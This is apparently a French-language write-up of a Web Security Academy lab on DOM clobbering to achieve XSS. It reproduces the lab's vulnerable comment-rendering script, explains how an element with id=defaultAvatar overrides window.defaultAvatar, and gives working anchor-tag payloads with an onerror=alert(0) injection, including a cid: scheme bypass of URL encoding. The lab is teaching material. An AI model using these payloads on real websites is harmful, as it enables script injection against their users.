XSS par clobbering DOM

Exploiting DOM clobbering to enable XSS

Lab: Exploiting DOM clobbering to enable XSS | Web Security AcademyWebSecAcademy

Exploiter une vulnérabilité de DOM-clobbering. La fonctionnalité des commentaires autorise un HTML « sûr ». L’objectif est d’injecter un fragment HTML qui écrase une variable DOM (clobbering) et d’enchaîner sur une exécution XSS (alert()).

La zone de commentaires accepte du HTML et certains éléments sont rendus (par ex. un <h1> s’interprète).

Le script côté client charge et affiche les commentaires récupérés en JSON. Il utilise DOMPurify.sanitize() pour nettoyer les champs author et body, mais d’autres manipulations DOM restent vulnérables au clobbering.

function loadComments(postCommentPath) {
    let xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            let comments = JSON.parse(this.responseText);
            displayComments(comments);
        }
    };
    xhr.open("GET", postCommentPath + window.location.search);
    xhr.send();

    function escapeHTML(data) {
        return data.replace(/[<>'"]/g, function(c){
            return '&#' + c.charCodeAt(0) + ';';
        })
    }

    function displayComments(comments) {
        let userComments = document.getElementById("user-comments");

        for (let i = 0; i < comments.length; ++i)
        {
            comment = comments[i];
            let commentSection = document.createElement("section");
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");

            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
            divImgContainer.innerHTML = avatarImgHTML

            if (comment.author) {
                if (comment.website) {
                    let websiteElement = document.createElement("a");
                    websiteElement.setAttribute("id", "author");
                    websiteElement.setAttribute("href", comment.website);
                    firstPElement.appendChild(websiteElement)
                }

                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
                firstPElement.innerHTML = newInnerHtml
            }

            if (comment.date) {
                let dateObj = new Date(comment.date)
                let month = '' + (dateObj.getMonth() + 1);
                let day = '' + dateObj.getDate();
                let year = dateObj.getFullYear();

                if (month.length < 2)
                    month = '0' + month;
                if (day.length < 2)
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
                firstPElement.innerHTML = newInnerHtml
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
                let commentBodyPElement = document.createElement("p");
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
            }
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);
        }
    }
};

Le code crée un objet defaultAvatar en lisant window.defaultAvatar si présent ; on peut donc écraser defaultAvatar via un élément DOM ayant un identifiant defaultAvatar (clobbering).
Comme l’attribut src de l’<img> est construit à partir de defaultAvatar.avatar lorsque comment.avatar est absent, il est possible de forcer un defaultAvatar contrôlé par l’attaquant pour influencer la valeur insérée.
L’insertion se fait par divImgContainer.innerHTML = avatarImgHTML, ce qui déclenche l’interprétation de la chaîne HTML construite.

let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

Tentative de forcer defaultAvatar via un élément <a id=defaultAvatar> contenant un attribut susceptible de provoquer une erreur côté client (ex. onerror=alert(0)).

<a id=defaultAvatar>
<a id=defaultAvatar name=avatar href="0&quot;onerror=alert(0)>//">

cela est urlencodé par le système

Contournement testé en utilisant un schéma cid: pour que la valeur ne soit pas encodée :

<a id=defaultAvatar>
<a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(0)>//">

ce dernier est interprété

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?